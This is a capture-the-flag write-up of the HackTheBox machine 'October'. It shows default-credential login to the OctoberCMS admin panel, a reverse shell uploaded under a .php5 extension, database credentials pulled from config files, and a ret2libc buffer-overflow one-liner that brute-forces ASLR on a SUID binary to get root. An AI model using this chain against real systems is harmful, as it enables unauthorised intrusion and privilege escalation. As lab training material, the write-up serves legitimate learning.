October — Write-up — HackTheBox

0xczar
7 min readDec 9, 2020

--

Box Creator:ch4p

October Box is a retired Medium-rated Linux Machine, who deals with Octobers CMS, Buffer Overflow and ASLR Brute Forcing.

OK so first things first, let’s start our Reconnaissance.

Reconnaissance

echo '10.10.10.16    october.htb' >> /etc/hosts
export IP=october.htb

nmap -vv -sV -sT -p- -O -A -oN nmap_scan.txt $IP

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 79:b1:35:b6:d1:25:12:a3:0c:b5:2e:36:9c:33:26:28 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBANmRR7UDp17vLPWjPYGFFxhFHygkw1gVmWZCAUO+TBY4OPnIWGRwrG+zyo39zVror9IS7wgI8rGUuwSd0Yc0xOYl>
| 2048 16:08:68:51:d1:7b:07:5a:34:66:0d:4c:d0:25:56:f5 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5Txq4c0jb5/pJpdDRWMw6kGit+0TeEKq3yWPLLPifxMillxkW1P4j51ANiLUE9wQjzBticFF4Ql6l>
| 256 e3:97:a7:92:23:72:bf:1d:09:88:85:b6:6c:17:4e:85 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKWJqXjmPMM11lDdFy512ITtTx1mh4bP6jxTLmGYtSBY>
| 256 89:85:90:98:20:bf:03:5d:35:7f:4a:a9:e1:1b:65:31 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA/9PENIoYUITEQDOKLYfiaUxVAgpixE8w//rH53DU7u
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.7 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 1D585CCF71E2EB73F03BCF484CFC2259
| http-methods:
| Supported Methods: GET HEAD POST PUT PATCH DELETE OPTIONS
|_ Potentially risky methods: PUT PATCH DELETE
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: October CMS - Vanilla

It seems thix Box got 2 open ports -
22 OpenSSH 6.6.1p1
80 Apache httpd 2.4.7 — which will be our main focus here.

Port 80 -

We land on the Welcome page of OctoberCMS which is a free, open-source and self-hosted content management system (CMS) based on the PHP programming language and Laravel web application framework. It supports MySQL, SQLite and PostgreSQL for the database back-end and uses a flat file database for the front end structure.
Moving around between Pages like account, Blog and Forum didn’t provide us with anything unusual. I did Registered an account an logged in.
I’ve tried to reply on the blog post with XSS tries and different tags, which ended up -

So that didn’t help much, next up I ran the following tools in order to discover more pages and hidden content.

root@kali:/home/czar/Downloads/HTB/october# dirb http://october.htb-----------------
DIRB v2.22
By The Dark Raver
-----------------OUTPUT_FILE: ./dirb_out.txt
URL_BASE: http://october.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Fine tunning of NOT_FOUND detection
OPTION: Printing LOCATION header
OPTION: Interactive Recursion-----------------
GENERATED WORDS: 4612---- Scanning URL: http://october.htb/ ----
+ http://october.htb/account (CODE:200|SIZE:264)
+ http://october.htb/backend (CODE:302|SIZE:400)
(Location: 'http://october.htb/backend/backend/auth')
+ http://october.htb/blog (CODE:200|SIZE:229)
+ http://october.htb/Blog (CODE:200|SIZE:229)
==> DIRECTORY: http://october.htb/config/
+ http://october.htb/error (CODE:200|SIZE:177)
+ http://october.htb/forgot-password (CODE:200|SIZE:206)
+ http://october.htb/forum (CODE:200|SIZE:383)

A few interesting hits -
http://october.htb/backend which redirects to http://october.htb/backend/backend/auth

At this stage I though it will be interesting to try some random creds such as username:password
admin:password
admin:admin — Success!

OK so now we manage to see the admin panel, which controls and manage all site’s content. From previous experience I had a feeling I’ll will probably will need to upload some .php shell to the blog content and from there moving on to getting shell.

I confirmed my assumption using https://www.exploit-db.com/exploits/41936, where we find that -

From there, clicking on Media, and click on Upload our .php reverse shell file, and since .php is being blocked, I had to rename it to php5 before uploading. Once the file is uploaded, we can use the “Public URL” link that will show us the public address of the file.

Setting up nc listener and spawn a shell using python.

root@kali:/home/czar/Downloads/HTB/october# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.21] from (UNKNOWN) [10.10.10.16] 52160
Linux october 4.4.0-78-generic #99~14.04.2-Ubuntu SMP Thu Apr 27 18:51:25 UTC 2017 i686 athlon i686 GNU/Linux
19:50:45 up 23 min, 0 users, load average: 10.06, 11.38, 13.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (1307): Inappropriate ioctl for device
bash: no job control in this shell
www-data@october:/$ python -c "import pty;pty.spawn('/bin/bash')"

Nice! so we got shell via www-data, navigating to /home/harry and we can see that our user.txt is there -

MySQL

OK so this is where it’s gets a bit tricky.

Running netstat -ltp, we can see that our localhost is listening on MySQL port, which is 3306, so there must be some database we can log in to and search for further info.
I decided to upload linpeas.sh and ran it to see what else we can find.

It revealed the following:
1. /var/www/html/cms/config/database.php
2. The localhost is listening on a MySQL port 3306 (we knew that already).
3. Last but not least found an interesting SUID — /usr/local/bin/ovrflw,
which we will get to it later.

cat /var/www/html/cms/config/database.php:---SNIP --
'mysql' => [
'driver' => 'mysql',
'host' => 'localhost',
'port' => '',
'database' => 'october',
'username' => 'october',
'password' => 'OctoberCMSPassword!!',
'charset' => 'utf8',
'collation' => 'utf8_unicode_ci',
'prefix' => '',

Nice, so we’ve got our self the DB credentials, let’s try and logged in -

Once we’re in, I ran the following queries -

use october;
show tables;
select * from users; --show registered user via the web app.
select * from backend_users; -- we get both harry and admin hashed credendtials.

BUT, as I was soon to find out, harry password is not manage to
be cracked by our friend “john” (and since admin user is seem to be inactive,
I though it would save us time and I’ll try harry’s hashed password only).
OK so I though I should wasted any more time trying to cracked these, and leave this Rabbit hole for now, and focus on the SUID.

Buffer Overflow and ASLR Brute Force

OK so back to our SUID file, let’s see first what it is.

We can see that ovrflw is a ELF 32-bit Least Significant Bit executable, Next move is to copy it to our local machine. In order to work on the file, we will need to download it first. A convenient way of download it is using netcat, another way is to copy the file to /storage/app/media/
and then download it via the web app.

The binary requires an input string, and by the name of it we should probably try and get a segmentation failed error. In this box I’ll use gdb.

OK so just like we thought, we BOF’ed it, and write over the EIP with
0x41414141 which are AAAA.

let’s try and see what protection it has using checksec.

NX enabled = no execution, meaning that we cannot use a shell code.
Checking for ASLR -

We can also run on the binary, It seems the libc address changes each time -

OK so ASLR is enable, let move on and use gdb to see where it will gets us.

As from previously we saw that we manage to Overflow it with ‘A’*120, let’s create a pattern using ruby and metasploit-framework -

Let’s send it via gdb.

Next, we will find the offset using, again, the metasploit-framework pattern_create/offset.

So now that we got the offset, I’ll try and overwrite the EIP, expecting to see 0x42424242 which translates to BBBB.

Let’s see the EIP —

OK so we spot out 0x42424242 at 0xffffd59c.

Finding libsec -

Since ASLR randomizes the offset location of the memory. We will need to Brute Force all possible addresses, let’s create a payload with these relevant values:
139: 00033260 45 FUNC GLOBAL DEFAULT 12 exit@@GLIBC_2.0
1443: 00040310 56 FUNC WEAK DEFAULT 12 system@@GLIBC_2.0
162bac /bin/sh

So the calculation should be like the following:
0x33260+0xb7592000 ==>0xB75C5260 EXIT
0x40310+0xb7592000 ==>
0xB75D2310 SYSTEM
0x162bac+0xb7592000 ==>
0xB76F4BAC /bin/sh

Putting it all together — ‘A’*112 + SYSTEM +EXIT + /bin/sh

while true; do /usr/local/bin/ovrflw $(python -c 'print "\x90"*112 + “\x10\x23\x5d\xb7” + “\x06\x52\x5c\xb7” + “\xac\x4b\x6f\xb7”’);done

after a minute or so we got root (:

--

--